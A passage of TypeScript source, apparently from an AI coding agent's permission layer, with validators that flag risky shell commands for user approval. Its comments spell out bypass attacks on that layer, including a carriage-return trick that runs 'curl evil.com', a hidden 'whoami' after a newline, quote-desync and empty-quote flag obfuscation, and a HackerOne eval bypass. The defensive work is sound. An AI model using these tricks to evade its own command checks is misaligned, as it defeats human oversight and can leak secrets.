// This catches potential obfuscation patterns like git commit -m "---"
|
|
if (messageContent && messageContent.startsWith('-')) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 5,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains quoted characters in flag names',
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'allow',
|
|
updatedInput: { command: originalCommand },
|
|
decisionReason: {
|
|
type: 'other',
|
|
reason: 'Git commit with simple quoted message is allowed',
|
|
},
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'Git commit needs validation' }
|
|
}
|
|
|
|
function validateJqCommand(context: ValidationContext): PermissionResult {
|
|
const { originalCommand, baseCommand } = context
|
|
|
|
if (baseCommand !== 'jq') {
|
|
return { behavior: 'passthrough', message: 'Not jq' }
|
|
}
|
|
|
|
if (/\bsystem\s*\(/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.JQ_SYSTEM_FUNCTION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'jq command contains system() function which executes arbitrary commands',
|
|
}
|
|
}
|
|
|
|
// File arguments are now allowed - they will be validated by path validation in readOnlyValidation.ts
|
|
// Only block dangerous flags that could read files into jq variables
|
|
const afterJq = originalCommand.substring(3).trim()
|
|
if (
|
|
/(?:^|\s)(?:-f\b|--from-file|--rawfile|--slurpfile|-L\b|--library-path)/.test(
|
|
afterJq,
|
|
)
|
|
) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.JQ_FILE_ARGUMENTS,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'jq command contains dangerous flags that could execute code or read arbitrary files',
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'jq command is safe' }
|
|
}
|
|
|
|
function validateShellMetacharacters(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { unquotedContent } = context
|
|
const message =
|
|
'Command contains shell metacharacters (;, |, or &) in arguments'
|
|
|
|
if (/(?:^|\s)["'][^"']*[;&][^"']*["'](?:\s|$)/.test(unquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
|
|
subId: 1,
|
|
})
|
|
return { behavior: 'ask', message }
|
|
}
|
|
|
|
const globPatterns = [
|
|
/-name\s+["'][^"']*[;|&][^"']*["']/,
|
|
/-path\s+["'][^"']*[;|&][^"']*["']/,
|
|
/-iname\s+["'][^"']*[;|&][^"']*["']/,
|
|
]
|
|
|
|
if (globPatterns.some(p => p.test(unquotedContent))) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
|
|
subId: 2,
|
|
})
|
|
return { behavior: 'ask', message }
|
|
}
|
|
|
|
if (/-regex\s+["'][^"']*[;&][^"']*["']/.test(unquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.SHELL_METACHARACTERS,
|
|
subId: 3,
|
|
})
|
|
return { behavior: 'ask', message }
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No metacharacters' }
|
|
}
|
|
|
|
function validateDangerousVariables(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { fullyUnquotedContent } = context
|
|
|
|
if (
|
|
/[<>|]\s*\$[A-Za-z_]/.test(fullyUnquotedContent) ||
|
|
/\$[A-Za-z_][A-Za-z0-9_]*\s*[|<>]/.test(fullyUnquotedContent)
|
|
) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_VARIABLES,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains variables in dangerous contexts (redirections or pipes)',
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No dangerous variables' }
|
|
}
|
|
|
|
function validateDangerousPatterns(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { unquotedContent } = context
|
|
|
|
// Special handling for backticks - check for UNESCAPED backticks only
|
|
// Escaped backticks (e.g., \`) are safe and commonly used in SQL commands
|
|
if (hasUnescapedChar(unquotedContent, '`')) {
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains backticks (`) for command substitution',
|
|
}
|
|
}
|
|
|
|
// Other command substitution checks (include double-quoted content)
|
|
for (const { pattern, message } of COMMAND_SUBSTITUTION_PATTERNS) {
|
|
if (pattern.test(unquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId:
|
|
BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION,
|
|
subId: 1,
|
|
})
|
|
return { behavior: 'ask', message: `Command contains ${message}` }
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No dangerous patterns' }
|
|
}
|
|
|
|
function validateRedirections(context: ValidationContext): PermissionResult {
|
|
const { fullyUnquotedContent } = context
|
|
|
|
if (/</.test(fullyUnquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_INPUT_REDIRECTION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains input redirection (<) which could read sensitive files',
|
|
}
|
|
}
|
|
|
|
if (/>/.test(fullyUnquotedContent)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.DANGEROUS_PATTERNS_OUTPUT_REDIRECTION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains output redirection (>) which could write to arbitrary files',
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No redirections' }
|
|
}
|
|
|
|
function validateNewlines(context: ValidationContext): PermissionResult {
|
|
// Use fullyUnquotedPreStrip (before stripSafeRedirections) to prevent bypasses
|
|
// where stripping `>/dev/null` creates a phantom backslash-newline continuation.
|
|
// E.g., `cmd \>/dev/null\nwhoami` → after stripping becomes `cmd \\nwhoami`
|
|
// which looks like a safe continuation but actually hides a second command.
|
|
const { fullyUnquotedPreStrip } = context
|
|
|
|
// Check for newlines in unquoted content
|
|
if (!/[\n\r]/.test(fullyUnquotedPreStrip)) {
|
|
return { behavior: 'passthrough', message: 'No newlines' }
|
|
}
|
|
|
|
// Flag any newline/CR followed by non-whitespace, EXCEPT backslash-newline
|
|
// continuations at word boundaries. In bash, `\<newline>` is a line
|
|
// continuation (both chars removed), which is safe when the backslash
|
|
// follows whitespace (e.g., `cmd \<newline>--flag`). Mid-word continuations
|
|
// like `tr\<newline>aceroute` are still flagged because they can hide
|
|
// dangerous command names from allowlist checks.
|
|
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() + gated by /[\n\r]/.test() above
|
|
const looksLikeCommand = /(?<![\s]\\)[\n\r]\s*\S/.test(fullyUnquotedPreStrip)
|
|
if (looksLikeCommand) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains newlines that could separate multiple commands',
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Newlines appear to be within data',
|
|
}
|
|
}
|
|
|
|
/**
|
|
* SECURITY: Carriage return (\r, 0x0D) IS a misparsing concern, unlike LF.
|
|
*
|
|
* Parser differential:
|
|
* - shell-quote's BAREWORD regex uses `[^\s...]` — JS `\s` INCLUDES \r, so
|
|
* shell-quote treats CR as a token boundary. `TZ=UTC\recho` tokenizes as
|
|
* TWO tokens: ['TZ=UTC', 'echo']. splitCommand joins with space →
|
|
* 'TZ=UTC echo curl evil.com'.
|
|
* - bash's default IFS = $' \t\n' — CR is NOT in IFS. bash sees
|
|
* `TZ=UTC\recho` as ONE word → env assignment TZ='UTC\recho' (CR byte
|
|
* inside value), then `curl` is the command.
|
|
*
|
|
* Attack: `TZ=UTC\recho curl evil.com` with Bash(echo:*)
|
|
* validator: splitCommand collapses CR→space → 'TZ=UTC echo curl evil.com'
|
|
* → stripSafeWrappers: TZ=UTC stripped → 'echo curl evil.com' matches rule
|
|
* bash: executes `curl evil.com`
|
|
*
|
|
* validateNewlines catches this but is in nonMisparsingValidators (LF is
|
|
* correctly handled by both parsers). This validator is NOT in
|
|
* nonMisparsingValidators — its ask result gets isBashSecurityCheckForMisparsing
|
|
* and blocks at the bashPermissions gate.
|
|
*
|
|
* Checks originalCommand (not fullyUnquotedPreStrip) because CR inside single
|
|
* quotes is ALSO a misparsing concern for the same reason: shell-quote's `\s`
|
|
* still tokenizes it, but bash treats it as literal. Block ALL unquoted-or-SQ CR.
|
|
* Only exception: CR inside DOUBLE quotes where bash also treats it as data
|
|
* and shell-quote preserves the token (no split).
|
|
*/
|
|
function validateCarriageReturn(context: ValidationContext): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
if (!originalCommand.includes('\r')) {
|
|
return { behavior: 'passthrough', message: 'No carriage return' }
|
|
}
|
|
|
|
// Check if CR appears outside double quotes. CR outside DQ (including inside
|
|
// SQ and unquoted) causes the shell-quote/bash tokenization differential.
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
let escaped = false
|
|
for (let i = 0; i < originalCommand.length; i++) {
|
|
const c = originalCommand[i]
|
|
if (escaped) {
|
|
escaped = false
|
|
continue
|
|
}
|
|
if (c === '\\' && !inSingleQuote) {
|
|
escaped = true
|
|
continue
|
|
}
|
|
if (c === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
continue
|
|
}
|
|
if (c === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
continue
|
|
}
|
|
if (c === '\r' && !inDoubleQuote) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.NEWLINES,
|
|
subId: 2,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains carriage return (\\r) which shell-quote and bash tokenize differently',
|
|
}
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'CR only inside double quotes' }
|
|
}
|
|
|
|
function validateIFSInjection(context: ValidationContext): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
// Detect any usage of IFS variable which could be used to bypass regex validation
|
|
// Check for $IFS and ${...IFS...} patterns (including parameter expansions like ${IFS:0:1}, ${#IFS}, etc.)
|
|
// Using ${[^}]*IFS to catch all parameter expansion variations with IFS
|
|
if (/\$IFS|\$\{[^}]*IFS/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.IFS_INJECTION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains IFS variable usage which could bypass security validation',
|
|
}
|
|
}
|
|
|
|
return { behavior: 'passthrough', message: 'No IFS injection detected' }
|
|
}
|
|
|
|
// Additional hardening against reading environment variables via /proc filesystem.
|
|
// Path validation typically blocks /proc access, but this provides defense-in-depth.
|
|
// Environment files in /proc can expose sensitive data like API keys and secrets.
|
|
function validateProcEnvironAccess(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
// Check for /proc paths that could expose environment variables
|
|
// This catches patterns like:
|
|
// - /proc/self/environ
|
|
// - /proc/1/environ
|
|
// - /proc/*/environ (with any PID)
|
|
if (/\/proc\/.*\/environ/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.PROC_ENVIRON_ACCESS,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command accesses /proc/*/environ which could expose sensitive environment variables',
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'No /proc/environ access detected',
|
|
}
|
|
}
|
|
|
|
/**
|
|
* Detects commands with malformed tokens (unbalanced delimiters) combined with
|
|
* command separators. This catches potential injection patterns where ambiguous
|
|
* shell syntax could be exploited.
|
|
*
|
|
* Security: This check catches the eval bypass discovered in HackerOne review.
|
|
* When shell-quote parses ambiguous patterns like `echo {"hi":"hi;evil"}`,
|
|
* it may produce unbalanced tokens (e.g., `{hi:"hi`). Combined with command
|
|
* separators, this can lead to unintended command execution via eval re-parsing.
|
|
*
|
|
* By forcing user approval for these patterns, we ensure the user sees exactly
|
|
* what will be executed before approving.
|
|
*/
|
|
function validateMalformedTokenInjection(
|
|
context: ValidationContext,
|
|
): PermissionResult {
|
|
const { originalCommand } = context
|
|
|
|
const parseResult = tryParseShellCommand(originalCommand)
|
|
if (!parseResult.success) {
|
|
// Parse failed - this is handled elsewhere (bashToolHasPermission checks this)
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'Parse failed, handled elsewhere',
|
|
}
|
|
}
|
|
|
|
const parsed = parseResult.tokens
|
|
|
|
// Check for command separators (;, &&, ||)
|
|
const hasCommandSeparator = parsed.some(
|
|
entry =>
|
|
typeof entry === 'object' &&
|
|
entry !== null &&
|
|
'op' in entry &&
|
|
(entry.op === ';' || entry.op === '&&' || entry.op === '||'),
|
|
)
|
|
|
|
if (!hasCommandSeparator) {
|
|
return { behavior: 'passthrough', message: 'No command separators' }
|
|
}
|
|
|
|
// Check for malformed tokens (unbalanced delimiters)
|
|
if (hasMalformedTokens(originalCommand, parsed)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.MALFORMED_TOKEN_INJECTION,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains ambiguous syntax with command separators that could be misinterpreted',
|
|
}
|
|
}
|
|
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'No malformed token injection detected',
|
|
}
|
|
}
|
|
|
|
function validateObfuscatedFlags(context: ValidationContext): PermissionResult {
|
|
// Block shell quoting bypass patterns used to circumvent negative lookaheads we use in our regexes to block known dangerous flags
|
|
|
|
const { originalCommand, baseCommand } = context
|
|
|
|
// Echo is safe for obfuscated flags, BUT only for simple echo commands.
|
|
// For compound commands (with |, &, ;), we need to check the whole command
|
|
// because the dangerous ANSI-C quoting might be after the operator.
|
|
const hasShellOperators = /[|&;]/.test(originalCommand)
|
|
if (baseCommand === 'echo' && !hasShellOperators) {
|
|
return {
|
|
behavior: 'passthrough',
|
|
message: 'echo command is safe and has no dangerous flags',
|
|
}
|
|
}
|
|
|
|
// COMPREHENSIVE OBFUSCATION DETECTION
|
|
// These checks catch various ways to hide flags using shell quoting
|
|
|
|
// 1. Block ANSI-C quoting ($'...') - can encode any character via escape sequences
|
|
// Simple pattern that matches $'...' anywhere. This correctly handles:
|
|
// - grep '$' file => no match ($ is regex anchor inside quotes, no $'...' structure)
|
|
// - 'test'$'-exec' => match (quote concatenation with ANSI-C)
|
|
// - Zero-width space and other invisible chars => match
|
|
// The pattern requires $' followed by content (can be empty) followed by closing '
|
|
if (/\$'[^']*'/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 5,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains ANSI-C quoting which can hide characters',
|
|
}
|
|
}
|
|
|
|
// 2. Block locale quoting ($"...") - can also use escape sequences
|
|
// Same simple pattern as ANSI-C quoting above
|
|
if (/\$"[^"]*"/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 6,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains locale quoting which can hide characters',
|
|
}
|
|
}
|
|
|
|
// 3. Block empty ANSI-C or locale quotes followed by dash
|
|
// $''-exec or $""-exec
|
|
if (/\$['"]{2}\s*-/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 9,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains empty special quotes before dash (potential bypass)',
|
|
}
|
|
}
|
|
|
|
// 4. Block ANY sequence of empty quotes followed by dash
|
|
// This catches: ''- ""- ''""- ""''- ''""''- etc.
|
|
// The pattern looks for one or more empty quote pairs followed by optional whitespace and dash
|
|
if (/(?:^|\s)(?:''|"")+\s*-/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 7,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains empty quotes before dash (potential bypass)',
|
|
}
|
|
}
|
|
|
|
// 4b. SECURITY: Block homogeneous empty quote pair(s) immediately adjacent
|
|
// to a quoted dash. Patterns like `"""-f"` (empty `""` + quoted `"-f"`)
|
|
// concatenate in bash to `-f` but slip past all the above checks:
|
|
// - Regex (4) above: `(?:''|"")+\s*-` matches `""` pair, then expects
|
|
// optional space and dash — but finds a third `"` instead. No match.
|
|
// - Quote-content scanner (below): Sees the first `""` pair with empty
|
|
// content (doesn't start with dash). The third `"` opens a new quoted
|
|
// region handled by the main quote-state tracker.
|
|
// - Quote-state tracker: `""` toggles inDoubleQuote on/off; third `"`
|
|
// opens it again. The `-` inside `"-f"` is INSIDE quotes → skipped.
|
|
// - Flag scanner: Looks for `\s` before `-`. The `-` is preceded by `"`.
|
|
// - fullyUnquotedContent: Both `""` and `"-f"` get stripped.
|
|
//
|
|
// In bash, `"""-f"` = empty string + string "-f" = `-f`. This bypass works
|
|
// for ANY dangerous-flag check (jq -f, find -exec, fc -e) with a matching
|
|
// prefix permission (Bash(jq:*), Bash(find:*)).
|
|
//
|
|
// The regex `(?:""|'')+['"]-` matches:
|
|
// - One or more HOMOGENEOUS empty pairs (`""` or `''`) — the concatenation
|
|
// point where bash joins the empty string to the flag.
|
|
// - Immediately followed by ANY quote char — opens the flag-quoted region.
|
|
// - Immediately followed by `-` — the obfuscated flag.
|
|
//
|
|
// POSITION-AGNOSTIC: We do NOT require word-start (`(?:^|\s)`) because
|
|
// prefixes like `$x"""-f"` (unset/empty variable) concatenate the same way.
|
|
// The homogeneous-empty-pair requirement filters out the `'"'"'` idiom
|
|
// (no homogeneous empty pair — it's close, double-quoted-content, open).
|
|
//
|
|
// FALSE POSITIVE: Matches `echo '"""-f" text'` (pattern inside single-quoted
|
|
// string). Extremely rare (requires echoing the literal attack). Acceptable.
|
|
if (/(?:""|'')+['"]-/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 10,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains empty quote pair adjacent to quoted dash (potential flag obfuscation)',
|
|
}
|
|
}
|
|
|
|
// 4c. SECURITY: Also block 3+ consecutive quotes at word start even without
|
|
// an immediate dash. Broader safety net for multi-quote obfuscation patterns
|
|
// not enumerated above (e.g., `"""x"-f` where content between quotes shifts
|
|
// the dash position). Legitimate commands never need `"""x"` when `"x"` works.
|
|
if (/(?:^|\s)['"]{3,}/.test(originalCommand)) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 11,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message:
|
|
'Command contains consecutive quote characters at word start (potential obfuscation)',
|
|
}
|
|
}
|
|
|
|
// Track quote state to avoid false positives for flags inside quoted strings
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
let escaped = false
|
|
|
|
for (let i = 0; i < originalCommand.length - 1; i++) {
|
|
const currentChar = originalCommand[i]
|
|
const nextChar = originalCommand[i + 1]
|
|
|
|
// Update quote state
|
|
if (escaped) {
|
|
escaped = false
|
|
continue
|
|
}
|
|
|
|
// SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
|
|
// `\` inside `'...'` is LITERAL. Without this guard, `'\'` desyncs the
|
|
// quote tracker: `\` sets escaped=true, closing `'` is consumed by the
|
|
// escaped-skip above instead of toggling inSingleQuote. Parser stays in
|
|
// single-quote mode, and the `if (inSingleQuote || inDoubleQuote) continue`
|
|
// at line ~1121 skips ALL subsequent flag detection for the rest of the
|
|
// command. Example: `jq '\' "-f" evil` — bash gets `-f` arg, but desynced
|
|
// parser thinks ` "-f" evil` is inside quotes → flag detection bypassed.
|
|
// Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns at
|
|
// line ~1856 before this runs. But we fix the tracker for consistency with
|
|
// the CORRECT implementations elsewhere in this file (hasBackslashEscaped*,
|
|
// extractQuotedContent) which all guard with `!inSingleQuote`.
|
|
if (currentChar === '\\' && !inSingleQuote) {
|
|
escaped = true
|
|
continue
|
|
}
|
|
|
|
if (currentChar === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
continue
|
|
}
|
|
|
|
if (currentChar === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
continue
|
|
}
|
|
|
|
// Only look for flags when not inside quoted strings
|
|
// This prevents false positives like: make test TEST="file.py -v"
|
|
if (inSingleQuote || inDoubleQuote) {
|
|
continue
|
|
}
|
|
|
|
// Look for whitespace followed by quote that contains a dash (potential flag obfuscation)
|
|
// SECURITY: Block ANY quoted content starting with dash - err on side of safety
|
|
// Catches: "-"exec, "-file", "--flag", '-'output, etc.
|
|
// Users can approve manually if legitimate (e.g., find . -name "-file")
|
|
if (
|
|
currentChar &&
|
|
nextChar &&
|
|
/\s/.test(currentChar) &&
|
|
/['"`]/.test(nextChar)
|
|
) {
|
|
const quoteChar = nextChar
|
|
let j = i + 2 // Start after the opening quote
|
|
let insideQuote = ''
|
|
|
|
// Collect content inside the quote
|
|
while (j < originalCommand.length && originalCommand[j] !== quoteChar) {
|
|
insideQuote += originalCommand[j]!
|
|
j++
|
|
}
|
|
|
|
// If we found a closing quote and the content looks like an obfuscated flag, block it.
|
|
// Three attack patterns to catch:
|
|
// 1. Flag name inside quotes: "--flag", "-exec", "-X" (dashes + letters inside)
|
|
// 2. Split-quote flag: "-"exec, "--"output (dashes inside, letters continue after quote)
|
|
// 3. Chained quotes: "-""exec" (dashes in first quote, second quote contains letters)
|
|
// Pure-dash strings like "---" or "--" followed by whitespace/separator are separators,
|
|
// not flags, and should not trigger this check.
|
|
const charAfterQuote = originalCommand[j + 1]
|
|
// Inside double quotes, $VAR and `cmd` expand at runtime, so "-$VAR" can
|
|
// become -exec. Blocking $ and ` here over-blocks single-quoted literals
|
|
// like grep '-$' (where $ is literal), but main's startsWith('-') already
|
|
// blocked those — this restores status quo, not a new false positive.
|
|
// Brace expansion ({) does NOT happen inside quotes, so { is not needed here.
|
|
const hasFlagCharsInside = /^-+[a-zA-Z0-9$`]/.test(insideQuote)
|
|
// Characters that can continue a flag after a closing quote. This catches:
|
|
// a-zA-Z0-9: "-"exec → -exec (direct concatenation)
|
|
// \\: "-"\exec → -exec (backslash escape is stripped)
|
|
// -: "-"-output → --output (extra dashes)
|
|
// {: "-"{exec,delete} → -exec -delete (brace expansion)
|
|
// $: "-"$VAR → -exec when VAR=exec (variable expansion)
|
|
// `: "-"`echo exec` → -exec (command substitution)
|
|
// Note: glob chars (*?[) are omitted — they require attacker-controlled
|
|
// filenames in CWD to exploit, and blocking them would break patterns
|
|
// like `ls -- "-"*` for listing files that start with dash.
|
|
const FLAG_CONTINUATION_CHARS = /[a-zA-Z0-9\\${`-]/
|
|
const hasFlagCharsContinuing =
|
|
/^-+$/.test(insideQuote) &&
|
|
charAfterQuote !== undefined &&
|
|
FLAG_CONTINUATION_CHARS.test(charAfterQuote)
|
|
// Handle adjacent quote chaining: "-""exec" or "-""-"exec or """-"exec concatenates
|
|
// to -exec in shell. Follow the chain of adjacent quoted segments until
|
|
// we find one containing an alphanumeric char or hit a non-quote boundary.
|
|
// Also handles empty prefix quotes: """-"exec where "" is followed by "-"exec
|
|
// The combined segments form a flag if they contain dash(es) followed by alphanumerics.
|
|
const hasFlagCharsInNextQuote =
|
|
// Trigger when: first segment is only dashes OR empty (could be prefix for flag)
|
|
(insideQuote === '' || /^-+$/.test(insideQuote)) &&
|
|
charAfterQuote !== undefined &&
|
|
/['"`]/.test(charAfterQuote) &&
|
|
(() => {
|
|
let pos = j + 1 // Start at charAfterQuote (an opening quote)
|
|
let combinedContent = insideQuote // Track what the shell will see
|
|
while (
|
|
pos < originalCommand.length &&
|
|
/['"`]/.test(originalCommand[pos]!)
|
|
) {
|
|
const segQuote = originalCommand[pos]!
|
|
let end = pos + 1
|
|
while (
|
|
end < originalCommand.length &&
|
|
originalCommand[end] !== segQuote
|
|
) {
|
|
end++
|
|
}
|
|
const segment = originalCommand.slice(pos + 1, end)
|
|
combinedContent += segment
|
|
|
|
// Check if combined content so far forms a flag pattern.
|
|
// Include $ and ` for in-quote expansion: "-""$VAR" → -exec
|
|
if (/^-+[a-zA-Z0-9$`]/.test(combinedContent)) return true
|
|
|
|
// If this segment has alphanumeric/expansion and we already have dashes,
|
|
// it's a flag. Catches "-""$*" where segment='$*' has no alnum but
|
|
// expands to positional params at runtime.
|
|
// Guard against segment.length === 0: slice(0, -0) → slice(0, 0) → ''.
|
|
const priorContent =
|
|
segment.length > 0
|
|
? combinedContent.slice(0, -segment.length)
|
|
: combinedContent
|
|
if (/^-+$/.test(priorContent)) {
|
|
if (/[a-zA-Z0-9$`]/.test(segment)) return true
|
|
}
|
|
|
|
if (end >= originalCommand.length) break // Unclosed quote
|
|
pos = end + 1 // Move past closing quote to check next segment
|
|
}
|
|
// Also check the unquoted char at the end of the chain
|
|
if (
|
|
pos < originalCommand.length &&
|
|
FLAG_CONTINUATION_CHARS.test(originalCommand[pos]!)
|
|
) {
|
|
// If we have dashes in combined content, the trailing char completes a flag
|
|
if (/^-+$/.test(combinedContent) || combinedContent === '') {
|
|
// Check if we're about to form a flag with the following content
|
|
const nextChar = originalCommand[pos]!
|
|
if (nextChar === '-') {
|
|
// More dashes, could still form a flag
|
|
return true
|
|
}
|
|
if (/[a-zA-Z0-9\\${`]/.test(nextChar) && combinedContent !== '') {
|
|
// We have dashes and now alphanumeric/expansion follows
|
|
return true
|
|
}
|
|
}
|
|
// Original check for dashes followed by alphanumeric
|
|
if (/^-/.test(combinedContent)) {
|
|
return true
|
|
}
|
|
}
|
|
return false
|
|
})()
|
|
if (
|
|
j < originalCommand.length &&
|
|
originalCommand[j] === quoteChar &&
|
|
(hasFlagCharsInside ||
|
|
hasFlagCharsContinuing ||
|
|
hasFlagCharsInNextQuote)
|
|
) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 4,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains quoted characters in flag names',
|
|
}
|
|
}
|
|
}
|
|
|
|
// Look for whitespace followed by dash - this starts a flag
|
|
if (currentChar && nextChar && /\s/.test(currentChar) && nextChar === '-') {
|
|
let j = i + 1 // Start at the dash
|
|
let flagContent = ''
|
|
|
|
// Collect flag content
|
|
while (j < originalCommand.length) {
|
|
const flagChar = originalCommand[j]
|
|
if (!flagChar) break
|
|
|
|
// End flag content once we hit whitespace or an equals sign
|
|
if (/[\s=]/.test(flagChar)) {
|
|
break
|
|
}
|
|
// End flag collection if we hit quote followed by non-flag character. This is needed to handle cases like -d"," which should be parsed as just -d
|
|
if (/['"`]/.test(flagChar)) {
|
|
// Special case for cut -d flag: the delimiter value can be quoted
|
|
// Example: cut -d'"' should parse as flag name: -d, value: '"'
|
|
// Note: We only apply this exception to cut -d specifically to avoid bypasses.
|
|
// Without this restriction, a command like `find -e"xec"` could be parsed as
|
|
// flag name: -e, bypassing our blocklist for -exec. By restricting to cut -d,
|
|
// we allow the legitimate use case while preventing obfuscation attacks on other
|
|
// commands where quoted flag values could hide dangerous flag names.
|
|
if (
|
|
baseCommand === 'cut' &&
|
|
flagContent === '-d' &&
|
|
/['"`]/.test(flagChar)
|
|
) {
|
|
// This is cut -d followed by a quoted delimiter - flagContent is already '-d'
|
|
break
|
|
}
|
|
|
|
// Look ahead to see what follows the quote
|
|
if (j + 1 < originalCommand.length) {
|
|
const nextFlagChar = originalCommand[j + 1]
|
|
if (nextFlagChar && !/[a-zA-Z0-9_'"-]/.test(nextFlagChar)) {
|
|
// Quote followed by something that is clearly not part of a flag, end the parsing
|
|
break
|
|
}
|
|
}
|
|
}
|
|
flagContent += flagChar
|
|
j++
|
|
}
|
|
|
|
if (flagContent.includes('"') || flagContent.includes("'")) {
|
|
logEvent('tengu_bash_security_check_triggered', {
|
|
checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
|
|
subId: 1,
|
|
})
|
|
return {
|
|
behavior: 'ask',
|
|
message: 'Command contains quoted characters in flag names',
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
